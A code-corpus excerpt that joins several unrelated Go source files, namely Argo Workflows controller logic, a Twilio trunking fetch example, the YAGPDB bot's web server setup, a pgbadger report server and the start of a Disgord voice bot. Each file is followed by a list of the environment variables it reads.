replaceMap[fmt.Sprintf("item.%s", itemKey)] = fmt.Sprintf("%v", itemVal)
vals = append(vals, fmt.Sprintf("%s:%v", itemKey, itemVal))
}
jsonByteVal, err := json.Marshal(mapVal)
if err != nil {
return "", errors.InternalWrapError(err)
}
replaceMap["item"] = string(jsonByteVal)
// sort the values so that the name is deterministic
sort.Strings(vals)
newName = generateNodeName(name, index, strings.Join(vals, ","))
case wfv1.List:
listVal := item.GetListVal()
byteVal, err := json.Marshal(listVal)
if err != nil {
return "", errors.InternalWrapError(err)
}
replaceMap["item"] = string(byteVal)
newName = generateNodeName(name, index, listVal)
default:
return "", errors.Errorf(errors.CodeBadRequest, "withItems[%d] expected string, number, list, or map. received: %v", index, item)
}
newStepStr, err := tmpl.Replace(replaceMap, false)
if err != nil {
return "", err
}
err = json.Unmarshal([]byte(newStepStr), &obj)
if err != nil {
return "", errors.InternalWrapError(err)
}
return newName, nil
}
func generateNodeName(name string, index int, desc interface{}) string {
// Do not display parentheses in node name. Nodes are still guaranteed to be unique due to the index number
replacer := strings.NewReplacer("(", "", ")", "")
cleanName := replacer.Replace(fmt.Sprint(desc))
newName := fmt.Sprintf("%s(%d:%v)", name, index, cleanName)
if out := util.RecoverIndexFromNodeName(newName); out != index {
panic(fmt.Sprintf("unrecoverable digit in generateName; wanted '%d' and got '%d'", index, out))
}
return newName
}
func expandSequence(seq *wfv1.Sequence) ([]wfv1.Item, error) {
var start, end int
var err error
if seq.Start != nil {
start, err = strconv.Atoi(seq.Start.String())
if err != nil {
return nil, err
}
}
if seq.End != nil {
end, err = strconv.Atoi(seq.End.String())
if err != nil {
return nil, err
}
} else if seq.Count != nil {
count, err := strconv.Atoi(seq.Count.String())
if err != nil {
return nil, err
}
if count == 0 {
return []wfv1.Item{}, nil
}
end = start + count - 1
} else {
return nil, errors.InternalError("neither end nor count was specified in withSequence")
}
items := make([]wfv1.Item, 0)
format := "%d"
if seq.Format != "" {
format = seq.Format
}
if start <= end {
for i := start; i <= end; i++ {
item, err := wfv1.ParseItem(`"` + fmt.Sprintf(format, i) + `"`)
if err != nil {
return nil, err
}
items = append(items, item)
}
} else {
for i := start; i >= end; i-- {
item, err := wfv1.ParseItem(`"` + fmt.Sprintf(format, i) + `"`)
if err != nil {
return nil, err
}
items = append(items, item)
}
}
return items, nil
}
func (woc *wfOperationCtx) substituteParamsInVolumes(params map[string]string) error {
if woc.volumes == nil {
return nil
}
volumes := woc.volumes
volumesBytes, err := json.Marshal(volumes)
if err != nil {
return errors.InternalWrapError(err)
}
newVolumesStr, err := template.Replace(string(volumesBytes), params, true)
if err != nil {
return err
}
var newVolumes []apiv1.Volume
err = json.Unmarshal([]byte(newVolumesStr), &newVolumes)
if err != nil {
return errors.InternalWrapError(err)
}
woc.volumes = newVolumes
return nil
}
// createTemplateContext creates a new template context.
func (woc *wfOperationCtx) createTemplateContext(scope wfv1.ResourceScope, resourceName string) (*templateresolution.Context, error) {
var clusterWorkflowTemplateGetter templateresolution.ClusterWorkflowTemplateGetter
if woc.controller.cwftmplInformer != nil {
clusterWorkflowTemplateGetter = woc.controller.cwftmplInformer.Lister()
} else {
clusterWorkflowTemplateGetter = &templateresolution.NullClusterWorkflowTemplateGetter{}
}
ctx := templateresolution.NewContext(woc.controller.wftmplInformer.Lister().WorkflowTemplates(woc.wf.Namespace), clusterWorkflowTemplateGetter, woc.execWf, woc.wf)
switch scope {
case wfv1.ResourceScopeNamespaced:
return ctx.WithWorkflowTemplate(resourceName)
case wfv1.ResourceScopeCluster:
return ctx.WithClusterWorkflowTemplate(resourceName)
default:
return ctx, nil
}
}
func (woc *wfOperationCtx) computeMetrics(metricList []*wfv1.Prometheus, localScope map[string]string, realTimeScope map[string]func() float64, realTimeOnly bool) {
for _, metricTmpl := range metricList {
// Don't process real time metrics after execution
if realTimeOnly && !metricTmpl.IsRealtime() {
continue
}
if metricTmpl.Help == "" {
woc.reportMetricEmissionError(fmt.Sprintf("metric '%s' must contain a help string under 'help: ' field", metricTmpl.Name))
continue
}
// Substitute parameters in non-value fields of the template to support variables in places such as labels,
// name, and help. We do not substitute value fields here (i.e. gauge, histogram, counter) here because they
// might be realtime ({{workflow.duration}} will not be substituted the same way if it's realtime or if it isn't).
metricTmplBytes, err := json.Marshal(metricTmpl)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("unable to substitute parameters for metric '%s' (marshal): %s", metricTmpl.Name, err))
continue
}
replacedValue, err := template.Replace(string(metricTmplBytes), localScope, false)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("unable to substitute parameters for metric '%s': %s", metricTmpl.Name, err))
continue
}
var metricTmplSubstituted wfv1.Prometheus
err = json.Unmarshal([]byte(replacedValue), &metricTmplSubstituted)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("unable to substitute parameters for metric '%s' (unmarshal): %s", metricTmpl.Name, err))
continue
}
// Only substitute non-value fields here. Value field substitution happens below
metricTmpl.Name = metricTmplSubstituted.Name
metricTmpl.Help = metricTmplSubstituted.Help
metricTmpl.Labels = metricTmplSubstituted.Labels
metricTmpl.When = metricTmplSubstituted.When
proceed, err := shouldExecute(metricTmpl.When)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("unable to compute 'when' clause for metric '%s': %s", woc.wf.ObjectMeta.Name, err))
continue
}
if !proceed {
continue
}
if metricTmpl.IsRealtime() {
// Finally substitute value parameters
value := metricTmpl.Gauge.Value
if !(strings.HasPrefix(value, "{{") && strings.HasSuffix(value, "}}")) {
woc.reportMetricEmissionError("real time metrics can only be used with metric variables")
continue
}
value = strings.TrimSuffix(strings.TrimPrefix(value, "{{"), "}}")
valueFunc, ok := realTimeScope[value]
if !ok {
woc.reportMetricEmissionError(fmt.Sprintf("'%s' is not available as a real time metric", value))
continue
}
updatedMetric, err := metrics.ConstructRealTimeGaugeMetric(metricTmpl, valueFunc)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("could not construct metric '%s': %s", metricTmpl.Name, err))
continue
}
err = woc.controller.metrics.UpsertCustomMetric(metricTmpl.GetDesc(), string(woc.wf.UID), updatedMetric, true)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("could not construct metric '%s': %s", metricTmpl.Name, err))
continue
}
continue
} else {
metricSpec := metricTmpl.DeepCopy()
// Finally substitute value parameters
replacedValue, err := template.Replace(metricSpec.GetValueString(), localScope, false)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("unable to substitute parameters for metric '%s': %s", metricSpec.Name, err))
continue
}
metricSpec.SetValueString(replacedValue)
metric := woc.controller.metrics.GetCustomMetric(metricSpec.GetDesc())
// It is valid to pass a nil metric to ConstructOrUpdateMetric, in that case the metric will be created for us
updatedMetric, err := metrics.ConstructOrUpdateMetric(metric, metricSpec)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("could not construct metric '%s': %s", metricSpec.Name, err))
continue
}
err = woc.controller.metrics.UpsertCustomMetric(metricSpec.GetDesc(), string(woc.wf.UID), updatedMetric, false)
if err != nil {
woc.reportMetricEmissionError(fmt.Sprintf("could not construct metric '%s': %s", metricSpec.Name, err))
continue
}
continue
}
}
}
func (woc *wfOperationCtx) reportMetricEmissionError(errorString string) {
woc.wf.Status.Conditions.UpsertConditionMessage(
wfv1.Condition{
Status: metav1.ConditionTrue,
Type: wfv1.ConditionTypeMetricsError,
Message: errorString,
})
woc.updated = true
woc.log.Error(errorString)
}
func (woc *wfOperationCtx) createPDBResource(ctx context.Context) error {
if woc.execWf.Spec.PodDisruptionBudget == nil {
return nil
}
pdb, err := woc.controller.kubeclientset.PolicyV1beta1().PodDisruptionBudgets(woc.wf.Namespace).Get(
ctx,
woc.wf.Name,
metav1.GetOptions{},
)
if err != nil && !apierr.IsNotFound(err) {
return err
}
if pdb != nil && pdb.Name != "" {
return nil
}
pdbSpec := *woc.execWf.Spec.PodDisruptionBudget
if pdbSpec.Selector == nil {
pdbSpec.Selector = &metav1.LabelSelector{
MatchLabels: map[string]string{common.LabelKeyWorkflow: woc.wf.Name},
}
}
newPDB := policyv1beta.PodDisruptionBudget{
ObjectMeta: metav1.ObjectMeta{
Name: woc.wf.Name,
Labels: map[string]string{common.LabelKeyWorkflow: woc.wf.Name},
OwnerReferences: []metav1.OwnerReference{
*metav1.NewControllerRef(woc.wf, wfv1.SchemeGroupVersion.WithKind(workflow.WorkflowKind)),
},
},
Spec: pdbSpec,
}
_, err = woc.controller.kubeclientset.PolicyV1beta1().PodDisruptionBudgets(woc.wf.Namespace).Create(ctx, &newPDB, metav1.CreateOptions{})
if err != nil {
return err
}
woc.log.Infof("Created PDB resource for workflow.")
woc.updated = true
return nil
}
func (woc *wfOperationCtx) deletePDBResource(ctx context.Context) error {
if woc.execWf.Spec.PodDisruptionBudget == nil {
return nil
}
err := waitutil.Backoff(retry.DefaultRetry, func() (bool, error) {
err := woc.controller.kubeclientset.PolicyV1beta1().PodDisruptionBudgets(woc.wf.Namespace).Delete(ctx, woc.wf.Name, metav1.DeleteOptions{})
if apierr.IsNotFound(err) {
return true, nil
}
return !errorsutil.IsTransientErr(err), err
})
if err != nil {
woc.log.WithField("err", err).Error("Unable to delete PDB resource for workflow.")
return err
}
woc.log.Infof("Deleted PDB resource for workflow.")
return nil
}
// Check if the output of this node is referenced elsewhere in the Workflow. If so, make sure to include it during
// execution.
func (woc *wfOperationCtx) includeScriptOutput(nodeName, boundaryID string) (bool, error) {
if boundaryNode, ok := woc.wf.Status.Nodes[boundaryID]; ok {
tmplCtx, err := woc.createTemplateContext(boundaryNode.GetTemplateScope())
if err != nil {
return false, err
}
_, parentTemplate, templateStored, err := tmplCtx.ResolveTemplate(&boundaryNode)
if err != nil {
return false, err
}
// A new template was stored during resolution, persist it
if templateStored {
woc.updated = true
}
name := getStepOrDAGTaskName(nodeName)
return hasOutputResultRef(name, parentTemplate), nil
}
return false, nil
}
func (woc *wfOperationCtx) fetchWorkflowSpec() (wfv1.WorkflowSpecHolder, error) {
if woc.wf.Spec.WorkflowTemplateRef == nil {
return nil, fmt.Errorf("cannot fetch workflow spec without workflowTemplateRef")
}
var specHolder wfv1.WorkflowSpecHolder
var err error
// Logic for workflow refers Workflow template
if woc.wf.Spec.WorkflowTemplateRef.ClusterScope {
specHolder, err = woc.controller.cwftmplInformer.Lister().Get(woc.wf.Spec.WorkflowTemplateRef.Name)
} else {
specHolder, err = woc.controller.wftmplInformer.Lister().WorkflowTemplates(woc.wf.Namespace).Get(woc.wf.Spec.WorkflowTemplateRef.Name)
}
if err != nil {
return nil, err
}
return specHolder, nil
}
func (woc *wfOperationCtx) retryStrategy(tmpl *wfv1.Template) *wfv1.RetryStrategy {
if tmpl != nil && tmpl.RetryStrategy != nil {
return tmpl.RetryStrategy
}
return woc.execWf.Spec.RetryStrategy
}
func (woc *wfOperationCtx) setExecWorkflow(ctx context.Context) error {
if woc.wf.Spec.WorkflowTemplateRef != nil {
err := woc.setStoredWfSpec()
if err != nil {
woc.markWorkflowError(ctx, err)
return err
}
woc.execWf = &wfv1.Workflow{Spec: *woc.wf.Status.StoredWorkflowSpec.DeepCopy()}
woc.volumes = woc.execWf.Spec.DeepCopy().Volumes
} else if woc.controller.Config.WorkflowRestrictions.MustUseReference() {
err := fmt.Errorf("workflows must use workflowTemplateRef to be executed when the controller is in reference mode")
woc.markWorkflowError(ctx, err)
return err
} else {
err := woc.controller.setWorkflowDefaults(woc.wf)
if err != nil {
woc.markWorkflowError(ctx, err)
return err
}
woc.volumes = woc.wf.Spec.DeepCopy().Volumes
}
// Perform one-time workflow validation
if woc.wf.Status.Phase == wfv1.WorkflowUnknown {
validateOpts := validate.ValidateOpts{ContainerRuntimeExecutor: woc.getContainerRuntimeExecutor()}
wftmplGetter := templateresolution.WrapWorkflowTemplateInterface(woc.controller.wfclientset.ArgoprojV1alpha1().WorkflowTemplates(woc.wf.Namespace))
cwftmplGetter := templateresolution.WrapClusterWorkflowTemplateInterface(woc.controller.wfclientset.ArgoprojV1alpha1().ClusterWorkflowTemplates())
// Validate the execution wfSpec
wfConditions, err := validate.ValidateWorkflow(wftmplGetter, cwftmplGetter, woc.wf, validateOpts)
if err != nil {
msg := fmt.Sprintf("invalid spec: %s", err.Error())
woc.markWorkflowFailed(ctx, msg)
return err
}
// If we received conditions during validation (such as SpecWarnings), add them to the Workflow object
if len(*wfConditions) > 0 {
woc.wf.Status.Conditions.JoinConditions(wfConditions)
woc.updated = true
}
}
woc.setGlobalParameters(woc.execWf.Spec.Arguments)
err := woc.substituteGlobalVariables()
if err != nil {
return err
}
return nil
}
func (woc *wfOperationCtx) GetShutdownStrategy() wfv1.ShutdownStrategy {
return woc.execWf.Spec.Shutdown
}
func (woc *wfOperationCtx) ShouldSuspend() bool {
return woc.execWf.Spec.Suspend != nil && *woc.execWf.Spec.Suspend
}
func (woc *wfOperationCtx) needsStoredWfSpecUpdate() bool {
// woc.wf.Status.StoredWorkflowSpec.Entrypoint == "" check is mainly to support backward compatible with 2.11.x workflow to 2.12.x
// Need to recalculate StoredWorkflowSpec in 2.12.x format.
// This check can be removed once all user migrated from 2.11.x to 2.12.x
return woc.wf.Status.StoredWorkflowSpec == nil || (woc.wf.Spec.Entrypoint != "" && woc.wf.Status.StoredWorkflowSpec.Entrypoint == "") ||
(woc.wf.Spec.Suspend != woc.wf.Status.StoredWorkflowSpec.Suspend) ||
(woc.wf.Spec.Shutdown != woc.wf.Status.StoredWorkflowSpec.Shutdown)
}
func (woc *wfOperationCtx) setStoredWfSpec() error {
wfDefault := woc.controller.Config.WorkflowDefaults
if wfDefault == nil {
wfDefault = &wfv1.Workflow{}
}
if woc.needsStoredWfSpecUpdate() {
wftHolder, err := woc.fetchWorkflowSpec()
if err != nil {
return err
}
// Join WFT and WfDefault metadata to Workflow metadata.
wfutil.JoinWorkflowMetaData(&woc.wf.ObjectMeta, wftHolder.GetWorkflowMetadata(), &wfDefault.ObjectMeta)
// Join workflow, workflow template, and workflow default metadata to workflow spec.
mergedWf, err := wfutil.JoinWorkflowSpec(&woc.wf.Spec, wftHolder.GetWorkflowSpec(), &wfDefault.Spec)
if err != nil {
return err
}
woc.wf.Status.StoredWorkflowSpec = &mergedWf.Spec
woc.updated = true
} else if woc.controller.Config.WorkflowRestrictions.MustNotChangeSpec() {
wftHolder, err := woc.fetchWorkflowSpec()
if err != nil {
return err
}
mergedWf, err := wfutil.JoinWorkflowSpec(&woc.wf.Spec, wftHolder.GetWorkflowSpec(), &wfDefault.Spec)
if err != nil {
return err
}
if mergedWf.Spec.String() != woc.wf.Status.StoredWorkflowSpec.String() {
return fmt.Errorf("workflowTemplateRef reference may not change during execution when the controller is in reference mode")
}
}
return nil
}
func (woc *wfOperationCtx) mergedTemplateDefaultsInto(originalTmpl *wfv1.Template) error {
if woc.execWf.Spec.TemplateDefaults != nil {
originalTmplType := originalTmpl.GetType()
tmplDefaultsJson, err := json.Marshal(woc.execWf.Spec.TemplateDefaults)
if err != nil {
return err
}
targetTmplJson, err := json.Marshal(originalTmpl)
if err != nil {
return err
}
resultTmpl, err := strategicpatch.StrategicMergePatch(tmplDefaultsJson, targetTmplJson, wfv1.Template{})
if err != nil {
return err
}
err = json.Unmarshal(resultTmpl, originalTmpl)
if err != nil {
return err
}
originalTmpl.SetType(originalTmplType)
}
return nil
}
func (woc *wfOperationCtx) substituteGlobalVariables() error {
wfSpec, err := json.Marshal(woc.execWf.Spec)
if err != nil {
return err
}
resolveSpec, err := template.Replace(string(wfSpec), woc.globalParams, true)
if err != nil {
return err
}
err = json.Unmarshal([]byte(resolveSpec), &woc.execWf.Spec)
if err != nil {
return err
}
return nil
}
|
[
"\"BUBBLE_ENTRY_TEMPLATE_ERR\"",
"\"INFORMER_WRITE_BACK\""
] |
[] |
[
"INFORMER_WRITE_BACK",
"BUBBLE_ENTRY_TEMPLATE_ERR"
] |
[]
|
["INFORMER_WRITE_BACK", "BUBBLE_ENTRY_TEMPLATE_ERR"]
|
go
| 2 | 0 | |
examples/service/trunking/ip_access_control_list/fetch/ip_access_control_list_fetch_example.go
|
package main
import (
"log"
"os"
"github.com/RJPearson94/twilio-sdk-go"
v1 "github.com/RJPearson94/twilio-sdk-go/service/trunking/v1"
"github.com/RJPearson94/twilio-sdk-go/session/credentials"
)
var trunkingClient *v1.Trunking
func init() {
creds, err := credentials.New(credentials.Account{
Sid: os.Getenv("TWILIO_ACCOUNT_SID"),
AuthToken: os.Getenv("TWILIO_AUTH_TOKEN"),
})
if err != nil {
log.Panicf("%s", err.Error())
}
trunkingClient = twilio.NewWithCredentials(creds).Trunking.V1
}
func main() {
resp, err := trunkingClient.
Trunk("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").
IpAccessControlList("ALXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").
Fetch()
if err != nil {
log.Panicf("%s", err.Error())
}
log.Printf("SID: %s", resp.Sid)
}
|
[
"\"TWILIO_ACCOUNT_SID\"",
"\"TWILIO_AUTH_TOKEN\""
] |
[] |
[
"TWILIO_AUTH_TOKEN",
"TWILIO_ACCOUNT_SID"
] |
[]
|
["TWILIO_AUTH_TOKEN", "TWILIO_ACCOUNT_SID"]
|
go
| 2 | 0 | |
web/web.go
|
package web
import (
"crypto/tls"
"flag"
"github.com/NYTimes/gziphandler"
"github.com/golang/crypto/acme/autocert"
"github.com/jonas747/discordgo"
"github.com/jonas747/yagpdb/bot/botrest"
"github.com/jonas747/yagpdb/common"
"github.com/jonas747/yagpdb/common/patreon"
yagtmpl "github.com/jonas747/yagpdb/common/templates"
"github.com/jonas747/yagpdb/web/discordblog"
"github.com/natefinch/lumberjack"
log "github.com/sirupsen/logrus"
"goji.io"
"goji.io/pat"
"html/template"
"net/http"
"os"
"strconv"
"strings"
"sync/atomic"
"time"
)
var (
// Core template files
Templates *template.Template
Debug = true // Turns on debug mode
ListenAddressHTTP = ":5000"
ListenAddressHTTPS = ":5001"
// Muxers
RootMux *goji.Mux
CPMux *goji.Mux
ServerPublicMux *goji.Mux
ServerPubliAPIMux *goji.Mux
properAddresses bool
https bool
acceptingRequests *int32
globalTemplateData = TemplateData(make(map[string]interface{}))
StartedAt = time.Now()
CurrentAd *Advertisement
)
type Advertisement struct {
Path template.URL
VideoUrls []template.URL
VideoTypes []string
LinkURL template.URL
Width int
Height int
}
func init() {
b := int32(1)
acceptingRequests = &b
Templates = template.New("")
Templates = Templates.Funcs(template.FuncMap{
"mTemplate": mTemplate,
"hasPerm": hasPerm,
"formatTime": prettyTime,
"roleOptions": tmplRoleDropdown,
"roleOptionsMulti": tmplRoleDropdownMutli,
"textChannelOptions": tmplChannelOpts(discordgo.ChannelTypeGuildText, "#"),
"textChannelOptionsMulti": tmplChannelOptsMulti(discordgo.ChannelTypeGuildText, "#"),
"voiceChannelOptions": tmplChannelOpts(discordgo.ChannelTypeGuildVoice, ""),
"voiceChannelOptionsMulti": tmplChannelOptsMulti(discordgo.ChannelTypeGuildVoice, ""),
"catChannelOptions": tmplChannelOpts(discordgo.ChannelTypeGuildCategory, ""),
"catChannelOptionsMulti": tmplChannelOptsMulti(discordgo.ChannelTypeGuildCategory, ""),
})
Templates = Templates.Funcs(yagtmpl.StandardFuncMap)
flag.BoolVar(&properAddresses, "pa", false, "Sets the listen addresses to 80 and 443")
flag.BoolVar(&https, "https", true, "Serve web on HTTPS. Only disable when using an HTTPS reverse proxy.")
}
func LoadTemplates() {
Templates = template.Must(Templates.ParseFiles("templates/index.html", "templates/cp_main.html", "templates/cp_nav.html", "templates/cp_selectserver.html", "templates/cp_logs.html", "templates/status.html"))
}
func Run() {
LoadTemplates()
AddGlobalTemplateData("ClientID", common.Conf.ClientID)
AddGlobalTemplateData("Host", common.Conf.Host)
AddGlobalTemplateData("Version", common.VERSION)
AddGlobalTemplateData("Testing", common.Testing)
if properAddresses {
ListenAddressHTTP = ":80"
ListenAddressHTTPS = ":443"
}
patreon.Run()
InitOauth()
mux := setupRoutes()
// Start monitoring the bot
go botrest.RunPinger()
blogChannel := os.Getenv("YAGPDB_ANNOUNCEMENTS_CHANNEL")
parsedBlogChannel, _ := strconv.ParseInt(blogChannel, 10, 64)
if parsedBlogChannel != 0 {
go discordblog.RunPoller(common.BotSession, parsedBlogChannel, time.Minute)
}
LoadAd()
log.Info("Running webservers")
runServers(mux)
}
func LoadAd() {
path := os.Getenv("YAGPDB_AD_IMG_PATH")
linkurl := os.Getenv("YAGPDB_AD_LINK")
width, _ := strconv.Atoi(os.Getenv("YAGPDB_AD_W"))
height, _ := strconv.Atoi(os.Getenv("YAGPDB_AD_H"))
CurrentAd = &Advertisement{
Path: template.URL(path),
LinkURL: template.URL(linkurl),
Width: width,
Height: height,
}
videos := strings.Split(os.Getenv("YAGPDB_AD_VIDEO_PATHS"), ",")
for _, v := range videos {
if v == "" {
continue
}
CurrentAd.VideoUrls = append(CurrentAd.VideoUrls, template.URL(v))
split := strings.SplitN(v, ".", 2)
if len(split) < 2 {
CurrentAd.VideoTypes = append(CurrentAd.VideoTypes, "unknown")
continue
}
CurrentAd.VideoTypes = append(CurrentAd.VideoTypes, "video/"+split[1])
}
}
func Stop() {
atomic.StoreInt32(acceptingRequests, 0)
}
func IsAcceptingRequests() bool {
return atomic.LoadInt32(acceptingRequests) != 0
}
func runServers(mainMuxer *goji.Mux) {
if !https {
log.Info("Starting yagpdb web server http:", ListenAddressHTTP)
server := &http.Server{
Addr: ListenAddressHTTP,
Handler: mainMuxer,
IdleTimeout: time.Minute,
}
err := server.ListenAndServe()
if err != nil {
log.Error("Failed http ListenAndServe:", err)
}
} else {
log.Info("Starting yagpdb web server http:", ListenAddressHTTP, ", and https:", ListenAddressHTTPS)
cache := autocert.DirCache("cert")
certManager := autocert.Manager{
Prompt: autocert.AcceptTOS,
HostPolicy: autocert.HostWhitelist(common.Conf.Host, "www."+common.Conf.Host),
Email: common.Conf.Email,
Cache: cache,
}
// launch the redir server
go func() {
unsafeHandler := &http.Server{
Addr: ListenAddressHTTP,
Handler: certManager.HTTPHandler(http.HandlerFunc(httpsRedirHandler)),
IdleTimeout: time.Minute,
}
err := unsafeHandler.ListenAndServe()
if err != nil {
log.Error("Failed http ListenAndServe:", err)
}
}()
tlsServer := &http.Server{
Addr: ListenAddressHTTPS,
Handler: mainMuxer,
IdleTimeout: time.Minute,
TLSConfig: &tls.Config{
GetCertificate: certManager.GetCertificate,
},
}
err := tlsServer.ListenAndServeTLS("", "")
if err != nil {
log.Error("Failed https ListenAndServeTLS:", err)
}
}
}
func setupRoutes() *goji.Mux {
mux := goji.NewMux()
RootMux = mux
if os.Getenv("YAGPDB_DISABLE_REQUEST_LOGGING") == "" {
requestLogger := &lumberjack.Logger{
Filename: "access.log",
MaxSize: 10,
}
mux.Use(RequestLogger(requestLogger))
}
// Setup fileserver
mux.Handle(pat.Get("/static/*"), http.FileServer(http.Dir(".")))
// General middleware
mux.Use(gziphandler.GzipHandler)
mux.Use(MiscMiddleware)
mux.Use(BaseTemplateDataMiddleware)
mux.Use(SessionMiddleware)
mux.Use(UserInfoMiddleware)
// General handlers
mux.Handle(pat.Get("/"), ControllerHandler(HandleLandingPage, "index"))
mux.HandleFunc(pat.Get("/login"), HandleLogin)
mux.HandleFunc(pat.Get("/confirm_login"), HandleConfirmLogin)
mux.HandleFunc(pat.Get("/logout"), HandleLogout)
// The public muxer, for public server stuff like stats and logs
serverPublicMux := goji.SubMux()
serverPublicMux.Use(ActiveServerMW)
mux.Handle(pat.Get("/public/:server"), serverPublicMux)
mux.Handle(pat.Get("/public/:server/*"), serverPublicMux)
ServerPublicMux = serverPublicMux
ServerPubliAPIMux = goji.SubMux()
ServerPubliAPIMux.Use(ActiveServerMW)
mux.Handle(pat.Get("/api/:server"), ServerPubliAPIMux)
mux.Handle(pat.Get("/api/:server/*"), ServerPubliAPIMux)
ServerPubliAPIMux.Handle(pat.Get("/channelperms/:channel"), RequireActiveServer(APIHandler(HandleChanenlPermissions)))
// Server selection has it's own handler
mux.Handle(pat.Get("/manage"), RenderHandler(HandleSelectServer, "cp_selectserver"))
mux.Handle(pat.Get("/manage/"), RenderHandler(HandleSelectServer, "cp_selectserver"))
mux.Handle(pat.Get("/status"), ControllerHandler(HandleStatus, "cp_status"))
mux.Handle(pat.Get("/status/"), ControllerHandler(HandleStatus, "cp_status"))
mux.Handle(pat.Post("/shard/:shard/reconnect"), ControllerHandler(HandleReconnectShard, "cp_status"))
mux.Handle(pat.Post("/shard/:shard/reconnect/"), ControllerHandler(HandleReconnectShard, "cp_status"))
mux.HandleFunc(pat.Get("/cp"), legacyCPRedirHandler)
mux.HandleFunc(pat.Get("/cp/*"), legacyCPRedirHandler)
// Server control panel, requires you to be an admin for the server (owner or have server management role)
serverCpMuxer := goji.SubMux()
serverCpMuxer.Use(RequireSessionMiddleware)
serverCpMuxer.Use(ActiveServerMW)
serverCpMuxer.Use(RequireServerAdminMiddleware)
mux.Handle(pat.New("/manage/:server"), serverCpMuxer)
mux.Handle(pat.New("/manage/:server/*"), serverCpMuxer)
serverCpMuxer.Handle(pat.Get("/cplogs"), RenderHandler(HandleCPLogs, "cp_action_logs"))
serverCpMuxer.Handle(pat.Get("/cplogs/"), RenderHandler(HandleCPLogs, "cp_action_logs"))
CPMux = serverCpMuxer
for _, plugin := range common.Plugins {
if webPlugin, ok := plugin.(Plugin); ok {
webPlugin.InitWeb()
log.Info("Initialized web plugin:", plugin.Name())
}
}
return mux
}
func httpsRedirHandler(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, "https://"+r.Host+r.URL.String(), http.StatusMovedPermanently)
}
func AddGlobalTemplateData(key string, data interface{}) {
globalTemplateData[key] = data
}
func legacyCPRedirHandler(w http.ResponseWriter, r *http.Request) {
log.Println("Hit cp path: ", r.RequestURI)
trimmed := strings.TrimPrefix(r.RequestURI, "/cp")
http.Redirect(w, r, "/manage"+trimmed, http.StatusMovedPermanently)
}
|
[
"\"YAGPDB_ANNOUNCEMENTS_CHANNEL\"",
"\"YAGPDB_AD_IMG_PATH\"",
"\"YAGPDB_AD_LINK\"",
"\"YAGPDB_AD_W\"",
"\"YAGPDB_AD_H\"",
"\"YAGPDB_AD_VIDEO_PATHS\"",
"\"YAGPDB_DISABLE_REQUEST_LOGGING\""
] |
[] |
[
"YAGPDB_AD_IMG_PATH",
"YAGPDB_AD_LINK",
"YAGPDB_ANNOUNCEMENTS_CHANNEL",
"YAGPDB_DISABLE_REQUEST_LOGGING",
"YAGPDB_AD_VIDEO_PATHS",
"YAGPDB_AD_H",
"YAGPDB_AD_W"
] |
[]
|
["YAGPDB_AD_IMG_PATH", "YAGPDB_AD_LINK", "YAGPDB_ANNOUNCEMENTS_CHANNEL", "YAGPDB_DISABLE_REQUEST_LOGGING", "YAGPDB_AD_VIDEO_PATHS", "YAGPDB_AD_H", "YAGPDB_AD_W"]
|
go
| 7 | 0 | |
badger/badgerserver.go
|
/*
Copyright 2016 Crunchy Data Solutions, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"bytes"
"fmt"
"github.com/ant0ine/go-json-rest/rest"
"io/ioutil"
"log"
"net/http"
"os"
"os/exec"
"strconv"
)
const REPORT = "/tmp/badger.html"
func main() {
var VERSION = os.Getenv("CCP_VERSION")
fmt.Println("badgerserver: " + VERSION + " starting")
api := rest.NewApi()
api.Use(rest.DefaultDevStack...)
router, err := rest.MakeRouter(
&rest.Route{"GET", "/badgergenerate", BadgerGenerate},
)
if err != nil {
log.Fatal(err)
}
api.SetApp(router)
http.Handle("/api/", http.StripPrefix("/api", api.MakeHandler()))
http.Handle("/static/", http.StripPrefix("/static", http.FileServer(http.Dir("/tmp"))))
log.Fatal(http.ListenAndServe(":10000", nil))
//log.Fatal(http.ListenAndServeTLS(":10000", "/var/cpm/keys/cert.pem", "/var/cpm/keys/key.pem", nil))
}
// BadgerGenerate perform a pgbadger to create the HTML output file
func BadgerGenerate(w rest.ResponseWriter, r *rest.Request) {
fmt.Println("badgerserver: BadgerGenerate called")
var cmd *exec.Cmd
cmd = exec.Command("badger-generate.sh")
var out bytes.Buffer
var stderr bytes.Buffer
cmd.Stdout = &out
cmd.Stderr = &stderr
err := cmd.Run()
if err != nil {
fmt.Println(err.Error())
rest.Error(w, err.Error(), 400)
return
}
fmt.Println("badgerserver: BadgerGenerate run executed")
var buf []byte
buf, err = ioutil.ReadFile(REPORT)
if err != nil {
fmt.Println(err.Error())
rest.Error(w, err.Error(), 400)
return
}
var thing http.ResponseWriter
thing = w.(http.ResponseWriter)
thing.Header().Set("Content-Type", "text/html")
thing.Header().Set("Content-Length", strconv.Itoa(len(buf)))
thing.Write(buf)
fmt.Println("badgerserver: BadgerGenerate report written")
}
|
[
"\"CCP_VERSION\""
] |
[] |
[
"CCP_VERSION"
] |
[]
|
["CCP_VERSION"]
|
go
| 1 | 0 | |
docs/examples/voice/bot.go
|
package main
import (
"os"
"github.com/andersfylling/disgord"
)
const (
MyGuildID = disgord.Snowflake(26854385)
MyChannelID = disgord.Snowflake(93284097324)
)
// In this example code example, you can see how to let the bot send an audio fragment after receiving a command.
func main() {
client := disgord.New(disgord.Config{
BotToken: os.Getenv("DISCORD_TOKEN"),
})
gateway := client.Gateway()
defer gateway.StayConnectedUntilInterrupted()
var voice disgord.VoiceConnection
gateway.BotReady(func() {
// Once the bot has connected to the websocket, also connect to the voice channel
